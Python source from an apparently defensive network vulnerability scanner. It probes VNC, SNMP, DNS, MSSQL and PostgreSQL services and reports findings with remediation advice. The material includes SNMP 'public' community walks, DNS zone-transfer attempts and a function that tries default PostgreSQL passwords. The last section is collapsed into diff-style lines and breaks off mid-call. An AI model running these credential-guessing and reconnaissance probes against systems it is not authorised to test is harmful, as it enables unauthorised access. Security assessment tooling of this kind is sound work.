            elif "@ERROR" in resp and "auth" in resp.lower():
                # Module exists but requires auth — record that on the module entry.
                raw["modules"] = [
                    {**m, "auth_required": True} if m["name"] == mod["name"] else m
                    for m in raw["modules"]
                ]
        except Exception:
            pass

    return probe_result(raw_data=raw, findings=findings)


def _service_info_vnc(self, target, port):  # default port: 5900
    """
    VNC handshake: read version banner, negotiate security types.

    Security types:
        1 (None)      → CRITICAL: unauthenticated desktop access
        2 (VNC Auth)  → MEDIUM: DES-based, max 8-char password
        19 (VeNCrypt) → INFO: TLS-secured
        Other         → LOW: unknown auth type

    Parameters
    ----------
    target : str
        Hostname or IP address.
    port : int
        Port being probed.

    Returns
    -------
    dict
        Structured findings.
    """
    findings = []
    raw = {"banner": None, "security_types": []}

    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(3)
        sock.connect((target, port))

        # Read server banner (e.g. "RFB 003.008\n")
# Body of the VNC probe (its `def` and opening `try:` lie above this chunk),
# followed by the SNMP probe and its MIB-walk helpers, and the head of the DNS probe.

        banner = sock.recv(12).decode('ascii', errors='ignore').strip()
        raw["banner"] = banner

        if not banner.startswith("RFB"):
            findings.append(Finding(
                severity=Severity.MEDIUM,
                title=f"VNC service detected (non-standard banner: {banner[:30]})",
                description="VNC port open but banner is non-standard.",
                evidence=f"Banner: {banner}",
                remediation="Restrict VNC access to trusted networks or use SSH tunneling.",
                confidence="tentative",
            ))
            sock.close()
            return probe_result(raw_data=raw, findings=findings)

        # Echo version back to negotiate
        sock.sendall(banner.encode('ascii') + b"\n")

        # Read security type list
        sec_data = sock.recv(64)
        sec_types = []
        if len(sec_data) >= 1:
            num_types = sec_data[0]
            if num_types > 0 and len(sec_data) >= 1 + num_types:
                sec_types = list(sec_data[1:1 + num_types])
        raw["security_types"] = sec_types
        sock.close()

        _VNC_TYPE_NAMES = {1: "None", 2: "VNC Auth", 19: "VeNCrypt", 16: "Tight"}
        type_labels = [f"{t}({_VNC_TYPE_NAMES.get(t, 'unknown')})" for t in sec_types]
        raw["security_type_labels"] = type_labels

        if 1 in sec_types:
            findings.append(Finding(
                severity=Severity.CRITICAL,
                title="VNC unauthenticated access (security type None)",
                description=f"VNC on {target}:{port} allows connections without authentication.",
                evidence=f"Banner: {banner}, security types: {type_labels}",
                remediation="Disable security type None and require VNC Auth or VeNCrypt.",
                owasp_id="A07:2021",
                cwe_id="CWE-287",
                confidence="certain",
            ))
        if 2 in sec_types:
            findings.append(Finding(
                severity=Severity.MEDIUM,
                title="VNC password auth (DES-based, max 8 chars)",
                description=f"VNC Auth uses DES encryption with a maximum 8-character password.",
                evidence=f"Banner: {banner}, security types: {type_labels}",
                remediation="Use VeNCrypt (TLS) or SSH tunneling instead of plain VNC Auth.",
                owasp_id="A02:2021",
                cwe_id="CWE-326",
                confidence="certain",
            ))
        if 19 in sec_types:
            findings.append(Finding(
                severity=Severity.INFO,
                title="VNC VeNCrypt (TLS-secured)",
                description="VeNCrypt provides TLS-secured VNC connections.",
                evidence=f"Banner: {banner}, security types: {type_labels}",
                confidence="certain",
            ))
        if not sec_types:
            findings.append(Finding(
                severity=Severity.MEDIUM,
                title=f"VNC service exposed: {banner}",
                description="VNC protocol banner detected but security types could not be parsed.",
                evidence=f"Banner: {banner}",
                remediation="Restrict VNC access to trusted networks.",
                confidence="firm",
            ))

    except Exception as e:
        return probe_error(target, port, "VNC", e)

    return probe_result(raw_data=raw, findings=findings)


def _service_info_snmp(self, target, port):  # default port: 161
    """
    Attempt SNMP community string disclosure using 'public'.

    Parameters
    ----------
    target : str
        Hostname or IP address.
    port : int
        Port being probed.

    Returns
    -------
    dict
        Structured findings.
    """
    findings = []
    raw = {"banner": None}
    sock = None
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(2)
        # Pre-built SNMPv1 GET for sysDescr (1.3.6.1.2.1.1.1.0) with community 'public'
        packet = bytes.fromhex(
            "302e020103300702010304067075626c6963a019020405f5e10002010002010030100406082b060102010101000500"
        )
        sock.sendto(packet, (target, port))
        data, _ = sock.recvfrom(512)
        readable = ''.join(chr(b) if 32 <= b < 127 else '.' for b in data)
        if 'public' in readable.lower():
            raw["banner"] = readable.strip()[:120]
            findings.append(Finding(
                severity=Severity.HIGH,
                title="SNMP default community string 'public' accepted",
                description="SNMP agent responds to the default 'public' community string, "
                            "allowing unauthenticated read access to device configuration and network data.",
                evidence=f"Response: {readable.strip()[:80]}",
                remediation="Change the community string from 'public' to a strong value; migrate to SNMPv3.",
                owasp_id="A07:2021",
                cwe_id="CWE-798",
                confidence="certain",
            ))
            # Walk system MIB for additional intel
            mib_result = self._snmp_walk_system_mib(target, port)
            if mib_result:
                sys_info = mib_result.get("system", {})
                raw.update(sys_info)
                findings.extend(mib_result.get("findings", []))
        else:
            raw["banner"] = readable.strip()[:120]
            findings.append(Finding(
                severity=Severity.INFO,
                title="SNMP service responded",
                description=f"SNMP agent on {target}:{port} responded but did not accept 'public' community.",
                evidence=f"Response: {readable.strip()[:80]}",
                confidence="firm",
            ))
    except socket.timeout:
        return probe_error(target, port, "SNMP", Exception("timed out"))
    except Exception as e:
        return probe_error(target, port, "SNMP", e)
    finally:
        if sock is not None:
            sock.close()
    return probe_result(raw_data=raw, findings=findings)

# -- SNMP MIB walk helpers ------------------------------------------------

# Vendor keywords whose presence in sysDescr suggests an ICS/SCADA device.
_ICS_KEYWORDS = frozenset({
    "siemens", "simatic", "schneider", "allen-bradley", "honeywell",
    "abb", "modicon", "rockwell", "yokogawa", "emerson", "ge fanuc",
})

def _is_ics_indicator(self, text):
    # True if any known ICS vendor keyword appears in the text (case-insensitive).
    lower = text.lower()
    return any(kw in lower for kw in self._ICS_KEYWORDS)

@staticmethod
def _snmp_encode_oid(oid_str):
    # BER-encode a dotted OID: first two arcs packed as 40*X+Y, remaining
    # arcs base-128 with high-bit continuation.
    parts = [int(p) for p in oid_str.split(".")]
    body = bytes([40 * parts[0] + parts[1]])
    for v in parts[2:]:
        if v < 128:
            body += bytes([v])
        else:
            chunks = []
            chunks.append(v & 0x7F)
            v >>= 7
            while v:
                chunks.append(0x80 | (v & 0x7F))
                v >>= 7
            body += bytes(reversed(chunks))
    return body

def _snmp_build_getnext(self, community, oid_str, request_id=1):
    # Hand-assemble an SNMPv1 GetNextRequest (PDU tag 0xA1) for one OID.
    oid_body = self._snmp_encode_oid(oid_str)
    oid_tlv = bytes([0x06, len(oid_body)]) + oid_body
    varbind = bytes([0x30, len(oid_tlv) + 2]) + oid_tlv + b"\x05\x00"
    varbind_seq = bytes([0x30, len(varbind)]) + varbind
    req_id = bytes([0x02, 0x01, request_id & 0xFF])
    err_status = b"\x02\x01\x00"
    err_index = b"\x02\x01\x00"
    pdu_body = req_id + err_status + err_index + varbind_seq
    pdu = bytes([0xA1, len(pdu_body)]) + pdu_body
    version = b"\x02\x01\x00"
    comm = bytes([0x04, len(community)]) + community.encode()
    inner = version + comm + pdu
    return bytes([0x30, len(inner)]) + inner

@staticmethod
def _snmp_parse_response(data):
    # Minimal BER walk over a GetResponse; returns (oid_str, value) or (None, None).
    # NOTE(review): assumes single-byte BER lengths throughout — TODO confirm this
    # holds for all agents the probe targets.
    try:
        pos = 0
        if data[pos] != 0x30:
            return None, None
        pos += 2  # skip SEQUENCE tag + length
        # skip version
        if data[pos] != 0x02:
            return None, None
        pos += 2 + data[pos + 1]
        # skip community
        if data[pos] != 0x04:
            return None, None
        pos += 2 + data[pos + 1]
        # response PDU (0xA2)
        if data[pos] != 0xA2:
            return None, None
        pos += 2
        # skip request-id, error-status, error-index (3 integers)
        for _ in range(3):
            pos += 2 + data[pos + 1]
        # varbind list SEQUENCE
        pos += 2  # skip SEQUENCE tag + length
        # first varbind SEQUENCE
        pos += 2  # skip SEQUENCE tag + length
        # OID
        if data[pos] != 0x06:
            return None, None
        oid_len = data[pos + 1]
        oid_bytes = data[pos + 2: pos + 2 + oid_len]
        # decode OID
        parts = [str(oid_bytes[0] // 40), str(oid_bytes[0] % 40)]
        i = 1
        while i < len(oid_bytes):
            if oid_bytes[i] < 128:
                parts.append(str(oid_bytes[i]))
                i += 1
            else:
                val = 0
                while i < len(oid_bytes) and oid_bytes[i] & 0x80:
                    val = (val << 7) | (oid_bytes[i] & 0x7F)
                    i += 1
                if i < len(oid_bytes):
                    val = (val << 7) | oid_bytes[i]
                    i += 1
                parts.append(str(val))
        oid_str = ".".join(parts)
        pos += 2 + oid_len
        # value
        val_tag = data[pos]
        val_len = data[pos + 1]
        val_raw = data[pos + 2: pos + 2 + val_len]
        if val_tag == 0x04:  # OCTET STRING
            value = val_raw.decode("utf-8", errors="replace")
        elif val_tag == 0x02:  # INTEGER
            value = str(int.from_bytes(val_raw, "big", signed=True))
        elif val_tag == 0x43:  # TimeTicks
            value = str(int.from_bytes(val_raw, "big"))
        elif val_tag == 0x40:  # IpAddress (APPLICATION 0)
            if len(val_raw) == 4:
                value = ".".join(str(b) for b in val_raw)
            else:
                value = val_raw.hex()
        else:
            value = val_raw.hex()
        return oid_str, value
    except Exception:
        return None, None

# Base OIDs of the MIB-II system group mapped to their conventional names.
_SYSTEM_OID_NAMES = {
    "1.3.6.1.2.1.1.1": "sysDescr",
    "1.3.6.1.2.1.1.3": "sysUpTime",
    "1.3.6.1.2.1.1.4": "sysContact",
    "1.3.6.1.2.1.1.5": "sysName",
    "1.3.6.1.2.1.1.6": "sysLocation",
}

def _snmp_walk_system_mib(self, target, port):
    # GetNext-walk the system group and ipAddrTable using community 'public'.
    # Returns {"system": {...}, "findings": [...]} or None when nothing was learned.
    import ipaddress as _ipaddress
    system = {}
    walk_findings = []
    sock = None
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(2)

        def _walk(prefix):
            # Bounded GetNext walk (max 20 steps) constrained to the prefix subtree.
            oid = prefix
            results = []
            for _ in range(20):
                pkt = self._snmp_build_getnext("public", oid)
                sock.sendto(pkt, (target, port))
                try:
                    resp, _ = sock.recvfrom(1024)
                except socket.timeout:
                    break
                resp_oid, resp_val = self._snmp_parse_response(resp)
                if resp_oid is None or not resp_oid.startswith(prefix + "."):
                    break
                results.append((resp_oid, resp_val))
                oid = resp_oid
            return results

        # Walk system MIB subtree
        for resp_oid, resp_val in _walk("1.3.6.1.2.1.1"):
            base = ".".join(resp_oid.split(".")[:8])
            name = self._SYSTEM_OID_NAMES.get(base)
            if name:
                system[name] = resp_val

        sys_descr = system.get("sysDescr", "")
        if sys_descr:
            self._emit_metadata("os_claims", f"snmp:{port}", sys_descr)
            if self._is_ics_indicator(sys_descr):
                walk_findings.append(Finding(
                    severity=Severity.HIGH,
                    title="SNMP exposes ICS/SCADA device identity",
                    description=f"sysDescr contains ICS keywords: {sys_descr[:120]}",
                    evidence=f"sysDescr={sys_descr[:120]}",
                    remediation="Isolate ICS devices from general network; restrict SNMP access.",
                    confidence="firm",
                ))

        # Walk ipAddrTable for interface IPs
        for resp_oid, resp_val in _walk("1.3.6.1.2.1.4.20.1.1"):
            try:
                addr = _ipaddress.ip_address(resp_val)
            except (ValueError, TypeError):
                continue
            if addr.is_private:
                self._emit_metadata("internal_ips", {"ip": str(addr), "source": f"snmp_interface:{port}"})
                walk_findings.append(Finding(
                    severity=Severity.MEDIUM,
                    title=f"SNMP leaks internal IP address {addr}",
                    description="Interface IP from ipAddrTable is RFC1918, revealing internal topology.",
                    evidence=f"ipAddrEntry={resp_val}",
                    remediation="Restrict SNMP read access; filter sensitive MIBs.",
                    confidence="certain",
                ))
    except Exception:
        pass
    finally:
        if sock is not None:
            sock.close()
    if not system and not walk_findings:
        return None
    return {"system": system, "findings": walk_findings}


def _service_info_dns(self, target, port):  # default port: 53
    """
    Query CHAOS TXT version.bind to detect DNS version disclosure.

    Parameters
    ----------
    target : str
        Hostname or IP address.
    port : int
        Port being probed.

    Returns
    -------
    dict
        Structured findings.
    """
# Body of the DNS probe (its `def` and docstring lie above this chunk), followed
# by SOA-based zone discovery and the head of the AXFR test.

    findings = []
    raw = {"banner": None, "dns_version": None}
    sock = None
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(2)
        tid = random.randint(0, 0xffff)
        header = struct.pack('>HHHHHH', tid, 0x0100, 1, 0, 0, 0)
        qname = b'\x07version\x04bind\x00'
        # QTYPE=16 (TXT), QCLASS=3 (CHAOS)
        question = struct.pack('>HH', 16, 3)
        packet = header + qname + question
        sock.sendto(packet, (target, port))
        data, _ = sock.recvfrom(512)

        # Parse CHAOS TXT response
        parsed = False
        if len(data) >= 12 and struct.unpack('>H', data[:2])[0] == tid:
            ancount = struct.unpack('>H', data[6:8])[0]
            if ancount:
                # Skip header + echoed question to reach the first answer RR.
                idx = 12 + len(qname) + 4
                if idx < len(data):
                    if data[idx] & 0xc0 == 0xc0:
                        # Compressed name pointer (2 bytes)
                        idx += 2
                    else:
                        while idx < len(data) and data[idx] != 0:
                            idx += data[idx] + 1
                        idx += 1
                    # Skip TYPE, CLASS, TTL (2 + 2 + 4 bytes)
                    idx += 8
                    if idx + 2 <= len(data):
                        rdlength = struct.unpack('>H', data[idx:idx+2])[0]
                        idx += 2
                        if idx < len(data):
                            txt_length = data[idx]
                            txt = data[idx+1:idx+1+txt_length].decode('utf-8', errors='ignore')
                            if txt:
                                raw["dns_version"] = txt
                                raw["banner"] = f"DNS version: {txt}"
                                findings.append(Finding(
                                    severity=Severity.LOW,
                                    title=f"DNS version disclosure: {txt}",
                                    description=f"CHAOS TXT version.bind query reveals DNS software version.",
                                    evidence=f"version.bind TXT: {txt}",
                                    remediation="Disable version.bind responses in the DNS server configuration.",
                                    owasp_id="A05:2021",
                                    cwe_id="CWE-200",
                                    confidence="certain",
                                ))
                                parsed = True
                                # CVE check — version.bind is BIND-specific
                                _bind_m = _re.search(r'(\d+\.\d+(?:\.\d+)*)', txt)
                                if _bind_m:
                                    findings += check_cves("bind", _bind_m.group(1))

        # Fallback: check raw data for version keywords
        if not parsed:
            readable = ''.join(chr(b) if 32 <= b < 127 else '.' for b in data)
            if 'bind' in readable.lower() or 'version' in readable.lower():
                raw["banner"] = readable.strip()[:80]
                findings.append(Finding(
                    severity=Severity.LOW,
                    title="DNS version disclosure via CHAOS TXT",
                    description=f"CHAOS TXT response on {target}:{port} contains version keywords.",
                    evidence=f"Response contains: {readable.strip()[:80]}",
                    remediation="Disable version.bind responses in the DNS server configuration.",
                    owasp_id="A05:2021",
                    cwe_id="CWE-200",
                    confidence="firm",
                ))
            else:
                raw["banner"] = "DNS service responding"
                findings.append(Finding(
                    severity=Severity.INFO,
                    title="DNS CHAOS TXT query did not disclose version",
                    description=f"DNS on {target}:{port} responded but did not reveal version.",
                    confidence="firm",
                ))
    except socket.timeout:
        return probe_error(target, port, "DNS", Exception("CHAOS query timed out"))
    except Exception as e:
        return probe_error(target, port, "DNS", e)
    finally:
        if sock is not None:
            sock.close()

    # --- DNS zone transfer (AXFR) test ---
    axfr_findings = self._dns_test_axfr(target, port)
    findings += axfr_findings

    # --- Open recursive resolver test ---
    resolver_finding = self._dns_test_open_resolver(target, port)
    if resolver_finding:
        findings.append(resolver_finding)

    return probe_result(raw_data=raw, findings=findings)


def _dns_discover_zones(self, target, port):
    """Discover zone names the DNS server is authoritative for.

    Strategy: send SOA queries for a set of candidate domains and check
    for authoritative (AA-flag) responses. This is far more reliable than
    reverse-DNS guessing when the target serves non-obvious zones.

    Returns list of domain strings (may be empty).
    """
    candidates = set()

    # 1. Reverse DNS of target → extract domain
    try:
        import socket as _socket
        hostname, _, _ = _socket.gethostbyaddr(target)
        parts = hostname.split(".")
        if len(parts) >= 2:
            candidates.add(".".join(parts[-2:]))
        if len(parts) >= 3:
            candidates.add(".".join(parts[-3:]))
    except Exception:
        pass

    # 2. Common pentest / CTF domains
    candidates.update(["vulhub.org", "example.com", "test.local"])

    # 3. Probe each candidate with a SOA query — keep only authoritative hits
    authoritative = []
    for domain in list(candidates):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            sock.settimeout(2)
            tid = random.randint(0, 0xffff)
            header = struct.pack('>HHHHHH', tid, 0x0100, 1, 0, 0, 0)
            qname = b""
            for label in domain.split("."):
                qname += bytes([len(label)]) + label.encode()
            qname += b"\x00"
            question = struct.pack('>HH', 6, 1)  # QTYPE=SOA, QCLASS=IN
            sock.sendto(header + qname + question, (target, port))
            data, _ = sock.recvfrom(512)
            sock.close()
            if len(data) >= 12 and struct.unpack('>H', data[:2])[0] == tid:
                flags = struct.unpack('>H', data[2:4])[0]
                aa = (flags >> 10) & 1  # Authoritative Answer
                rcode = flags & 0x0F
                ancount = struct.unpack('>H', data[6:8])[0]
                if aa and rcode == 0 and ancount > 0:
                    authoritative.append(domain)
        except Exception:
            pass

    # Return authoritative zones first, then remaining candidates as fallback
    seen = set(authoritative)
    result = list(authoritative)
    for d in candidates:
        if d not in seen:
            result.append(d)
    return result


def _dns_test_axfr(self, target, port):
    """Attempt DNS zone transfer (AXFR) via TCP.

    Uses SOA-based zone discovery to find authoritative zones before
    attempting AXFR, falling back to reverse DNS and common domains.

    Returns list of findings.
    """
# Body of the AXFR test (its `def` and docstring lie above this chunk), followed
# by the open-resolver test, the MSSQL probe, and the head of the PostgreSQL probe.

    findings = []

    test_domains = self._dns_discover_zones(target, port)

    for domain in test_domains[:4]:  # Test at most 4 domains
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(3)
            sock.connect((target, port))

            # Build AXFR query
            tid = random.randint(0, 0xffff)
            header = struct.pack('>HHHHHH', tid, 0x0100, 1, 0, 0, 0)
            # Encode domain name
            qname = b""
            for label in domain.split("."):
                qname += bytes([len(label)]) + label.encode()
            qname += b"\x00"
            # QTYPE=252 (AXFR), QCLASS=1 (IN)
            question = struct.pack('>HH', 252, 1)
            dns_query = header + qname + question
            # TCP DNS: 2-byte length prefix
            sock.sendall(struct.pack(">H", len(dns_query)) + dns_query)

            # Read response
            resp_len_bytes = sock.recv(2)
            if len(resp_len_bytes) < 2:
                sock.close()
                continue
            resp_len = struct.unpack(">H", resp_len_bytes)[0]
            resp_data = b""
            while len(resp_data) < resp_len:
                chunk = sock.recv(resp_len - len(resp_data))
                if not chunk:
                    break
                resp_data += chunk
            sock.close()

            # Parse: check if we got answers (ancount > 0) and no error (rcode = 0)
            if len(resp_data) >= 12:
                resp_tid = struct.unpack(">H", resp_data[0:2])[0]
                flags = struct.unpack(">H", resp_data[2:4])[0]
                rcode = flags & 0x0F
                ancount = struct.unpack(">H", resp_data[6:8])[0]

                if resp_tid == tid and rcode == 0 and ancount > 0:
                    findings.append(Finding(
                        severity=Severity.HIGH,
                        title=f"DNS zone transfer (AXFR) allowed for {domain}",
                        description=f"DNS on {target}:{port} permits zone transfers for '{domain}'. "
                                    "This leaks all DNS records — hostnames, IPs, mail servers, internal infrastructure.",
                        evidence=f"AXFR query returned {ancount} answer records for {domain}.",
                        remediation="Restrict zone transfers to authorized secondary nameservers only (allow-transfer).",
                        owasp_id="A01:2021",
                        cwe_id="CWE-200",
                        confidence="certain",
                    ))
                    break  # One confirmed AXFR is enough
        except Exception:
            continue

    return findings


def _dns_test_open_resolver(self, target, port):
    """Test if DNS server acts as an open recursive resolver.

    Returns Finding or None.
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(2)
        tid = random.randint(0, 0xffff)
        # Standard recursive query for example.com A record
        header = struct.pack('>HHHHHH', tid, 0x0100, 1, 0, 0, 0)  # RD=1
        qname = b'\x07example\x03com\x00'
        question = struct.pack('>HH', 1, 1)  # QTYPE=A, QCLASS=IN
        packet = header + qname + question
        sock.sendto(packet, (target, port))
        data, _ = sock.recvfrom(512)
        sock.close()

        if len(data) >= 12 and struct.unpack('>H', data[:2])[0] == tid:
            flags = struct.unpack('>H', data[2:4])[0]
            qr = (flags >> 15) & 1
            rcode = flags & 0x0F
            ancount = struct.unpack('>H', data[6:8])[0]
            ra = (flags >> 7) & 1  # Recursion Available

            if qr == 1 and rcode == 0 and ancount > 0 and ra == 1:
                return Finding(
                    severity=Severity.MEDIUM,
                    title="DNS open recursive resolver detected",
                    description=f"DNS on {target}:{port} recursively resolves queries for external domains. "
                                "Open resolvers can be abused for DNS amplification DDoS attacks.",
                    evidence=f"Recursive query for example.com returned {ancount} answers with RA flag set.",
                    remediation="Restrict recursive queries to authorized clients only (allow-recursion).",
                    owasp_id="A05:2021",
                    cwe_id="CWE-406",
                    confidence="certain",
                )
    except Exception:
        pass
    return None


def _service_info_mssql(self, target, port):  # default port: 1433
    """
    Send a TDS prelogin probe to expose SQL Server version data.

    Parameters
    ----------
    target : str
        Hostname or IP address.
    port : int
        Port being probed.

    Returns
    -------
    dict
        Structured findings.
    """
    findings = []
    raw = {"banner": None}
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(3)
        sock.connect((target, port))
        # Minimal TDS PRELOGIN packet (type 0x12)
        prelogin = bytes.fromhex(
            "1201001600000000000000000000000000000000000000000000000000000000"
        )
        sock.sendall(prelogin)
        data = sock.recv(256)
        if data:
            readable = ''.join(chr(b) if 32 <= b < 127 else '.' for b in data)
            raw["banner"] = f"MSSQL prelogin response: {readable.strip()[:80]}"
            findings.append(Finding(
                severity=Severity.MEDIUM,
                title="MSSQL prelogin handshake succeeded",
                description=f"SQL Server on {target}:{port} responds to TDS prelogin, "
                            "exposing version metadata and confirming the service is reachable.",
                evidence=f"Prelogin response: {readable.strip()[:80]}",
                remediation="Restrict SQL Server access to trusted networks; use firewall rules.",
                owasp_id="A05:2021",
                cwe_id="CWE-200",
                confidence="certain",
            ))
        sock.close()
    except Exception as e:
        return probe_error(target, port, "MSSQL", e)
    return probe_result(raw_data=raw, findings=findings)


def _service_info_postgresql(self, target, port):  # default port: 5432
    """
    Probe PostgreSQL authentication method and extract server version.

    Sends a v3 StartupMessage for user 'postgres'. The server replies with
    an authentication request (type 'R') optionally followed by ParameterStatus
    messages (type 'S') that include ``server_version``.

    Auth codes:
        0  = AuthenticationOk (trust auth) → CRITICAL
        3  = CleartextPassword → MEDIUM
        5  = MD5Password → INFO (adequate, prefer SCRAM)
        10 = SASL (SCRAM-SHA-256) → INFO (strong)
    """
    findings = []
    raw = {"auth_type": None, "version": None}
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(3)
        sock.connect((target, port))
        payload = b'user\x00postgres\x00database\x00postgres\x00\x00'
        # 196608 = 0x00030000 → protocol version 3.0
        startup = struct.pack('!I', len(payload) + 8) + struct.pack('!I', 196608) + payload
        sock.sendall(startup)
        # Read enough to get auth response + parameter status messages
        data = b""
        try:
            while len(data) < 4096:
                chunk = sock.recv(4096)
                if not chunk:
                    break
                data += chunk
                # Stop after we see auth request — parameters come after for trust auth
                # but for password auth the server sends R then waits.
# Interior of the PostgreSQL probe — the recv loop opener and the surrounding
# try-blocks lie above this chunk; `data`, `raw` and `findings` are defined there.

                if len(data) >= 9 and data[0:1] == b'R':
                    auth_code = struct.unpack('!I', data[5:9])[0]
                    if auth_code != 0:
                        break  # Server wants a password — no more data coming
        except (socket.timeout, OSError):
            pass
        sock.close()

        # --- Extract version from ParameterStatus ('S') messages ---
        # Format: 'S' + int32 length + key\0 + value\0
        pg_version = None
        pos = 0
        while pos < len(data) - 5:
            msg_type = data[pos:pos+1]
            if msg_type not in (b'R', b'S', b'K', b'Z', b'E', b'N'):
                break
            msg_len = struct.unpack('!I', data[pos+1:pos+5])[0]
            msg_end = pos + 1 + msg_len
            if msg_type == b'S' and msg_end <= len(data):
                kv = data[pos+5:msg_end]
                parts = kv.split(b'\x00')
                if len(parts) >= 2:
                    key = parts[0].decode('utf-8', errors='ignore')
                    val = parts[1].decode('utf-8', errors='ignore')
                    if key == 'server_version':
                        pg_version = val
                        raw["version"] = pg_version
            pos = msg_end
            if pos >= len(data):
                break

        # --- Parse auth response ---
        if len(data) >= 9 and data[0:1] == b'R':
            auth_code = struct.unpack('!I', data[5:9])[0]
            raw["auth_type"] = auth_code
            if auth_code == 0:
                findings.append(Finding(
                    severity=Severity.CRITICAL,
                    title="PostgreSQL trust authentication (no password)",
                    description=f"PostgreSQL on {target}:{port} accepts connections without any password (auth code 0).",
                    evidence=f"Auth response code: {auth_code}",
                    remediation="Configure pg_hba.conf to require password or SCRAM authentication.",
                    owasp_id="A07:2021",
                    cwe_id="CWE-287",
                    confidence="certain",
                ))
            elif auth_code == 3:
                findings.append(Finding(
                    severity=Severity.MEDIUM,
                    title="PostgreSQL cleartext password authentication",
                    description=f"PostgreSQL on {target}:{port} requests cleartext passwords.",
                    evidence=f"Auth response code: {auth_code}",
                    remediation="Switch to SCRAM-SHA-256 authentication in pg_hba.conf.",
                    owasp_id="A02:2021",
                    cwe_id="CWE-319",
                    confidence="certain",
                ))
            elif auth_code == 5:
                findings.append(Finding(
                    severity=Severity.INFO,
                    title="PostgreSQL MD5 authentication",
                    description="MD5 password auth is adequate but SCRAM-SHA-256 is preferred.",
                    evidence=f"Auth response code: {auth_code}",
                    remediation="Consider upgrading to SCRAM-SHA-256.",
                    confidence="certain",
                ))
            elif auth_code == 10:
                findings.append(Finding(
                    severity=Severity.INFO,
                    title="PostgreSQL SASL/SCRAM authentication",
                    description="Strong authentication (SCRAM-SHA-256) is in use.",
                    evidence=f"Auth response code: {auth_code}",
                    confidence="certain",
                ))
        elif b'AuthenticationCleartextPassword' in data:
            raw["auth_type"] = "cleartext_text"
            findings.append(Finding(
                severity=Severity.MEDIUM,
                title="PostgreSQL cleartext password authentication",
                description=f"PostgreSQL on {target}:{port} requests cleartext passwords.",
                evidence="Text response contained AuthenticationCleartextPassword",
                remediation="Switch to SCRAM-SHA-256 authentication.",
                owasp_id="A02:2021",
                cwe_id="CWE-319",
                confidence="firm",
            ))
        elif b'AuthenticationOk' in data:
            raw["auth_type"] = "ok_text"
            findings.append(Finding(
                severity=Severity.CRITICAL,
                title="PostgreSQL trust authentication (no password)",
                description=f"PostgreSQL on {target}:{port} accepted connection without authentication.",
                evidence="Text response contained AuthenticationOk",
                remediation="Configure pg_hba.conf to require password authentication.",
                owasp_id="A07:2021",
                cwe_id="CWE-287",
                confidence="firm",
            ))

        # --- Version disclosure ---
        if pg_version:
            findings.append(Finding(
                severity=Severity.LOW,
                title=f"PostgreSQL version disclosed: {pg_version}",
                description=f"PostgreSQL on {target}:{port} reports version {pg_version}.",
                evidence=f"server_version parameter: {pg_version}",
                remediation="Restrict network access to the PostgreSQL port.",
                cwe_id="CWE-200",
                confidence="certain",
            ))
            # Extract numeric version for CVE matching
            ver_match = _re.match(r'(\d+\.\d+(?:\.\d+)?)', pg_version)
if ver_match: - for f in check_cves("postgresql", ver_match.group(1)): - findings.append(f) - - if not findings: - findings.append(Finding(Severity.INFO, "PostgreSQL probe completed", "No auth weakness detected.")) - except Exception as e: - return probe_error(target, port, "PostgreSQL", e) - - return probe_result(raw_data=raw, findings=findings) - - def _service_info_postgresql_creds(self, target, port): # default port: 5432 - """ - PostgreSQL default credential testing (opt-in via active_auth feature group). - - Attempts cleartext password auth with common defaults. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - findings = [] - raw = {"tested_credentials": 0, "accepted_credentials": []} - creds = [("postgres", ""), ("postgres", "postgres"), ("postgres", "password")] - - for username, password in creds: - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - payload = f'user\x00{username}\x00database\x00postgres\x00\x00'.encode() - startup = struct.pack('!I', len(payload) + 8) + struct.pack('!I', 196608) + payload - sock.sendall(startup) - data = sock.recv(128) - - if len(data) >= 9 and data[0:1] == b'R': - auth_code = struct.unpack('!I', data[5:9])[0] - if auth_code == 0: - cred_str = f"{username}:(empty)" if not password else f"{username}:{password}" - raw["accepted_credentials"].append(cred_str) - findings.append(Finding( - severity=Severity.CRITICAL, - title=f"PostgreSQL trust auth for {username}", - description=f"No password required for user {username}.", - evidence=f"Auth code 0 for {cred_str}", - remediation="Configure pg_hba.conf to require authentication.", - owasp_id="A07:2021", - cwe_id="CWE-287", - confidence="certain", - )) - elif auth_code == 3: - # Send cleartext password - pwd_bytes = password.encode() + b'\x00' - pwd_msg = b'p' + struct.pack('!I', len(pwd_bytes) + 4) + 
pwd_bytes - sock.sendall(pwd_msg) - resp = sock.recv(4096) - if resp and resp[0:1] == b'R' and len(resp) >= 9: - result_code = struct.unpack('!I', resp[5:9])[0] - if result_code == 0: - cred_str = f"{username}:{password}" if password else f"{username}:(empty)" - raw["accepted_credentials"].append(cred_str) - findings.append(Finding( - severity=Severity.CRITICAL, - title=f"PostgreSQL default credential accepted: {cred_str}", - description=f"Cleartext password auth accepted for {cred_str}.", - evidence=f"Auth OK for {cred_str}", - remediation="Change default passwords.", - owasp_id="A07:2021", - cwe_id="CWE-798", - confidence="certain", - )) - findings += self._pg_extract_version_findings(resp) - elif auth_code == 5 and len(data) >= 13: - # MD5 auth: server sends 4-byte salt at bytes 9:13 - import hashlib - salt = data[9:13] - inner = hashlib.md5(password.encode() + username.encode()).hexdigest() - outer = 'md5' + hashlib.md5(inner.encode() + salt).hexdigest() - pwd_bytes = outer.encode() + b'\x00' - pwd_msg = b'p' + struct.pack('!I', len(pwd_bytes) + 4) + pwd_bytes - sock.sendall(pwd_msg) - resp = sock.recv(4096) - if resp and resp[0:1] == b'R' and len(resp) >= 9: - result_code = struct.unpack('!I', resp[5:9])[0] - if result_code == 0: - cred_str = f"{username}:{password}" if password else f"{username}:(empty)" - raw["accepted_credentials"].append(cred_str) - findings.append(Finding( - 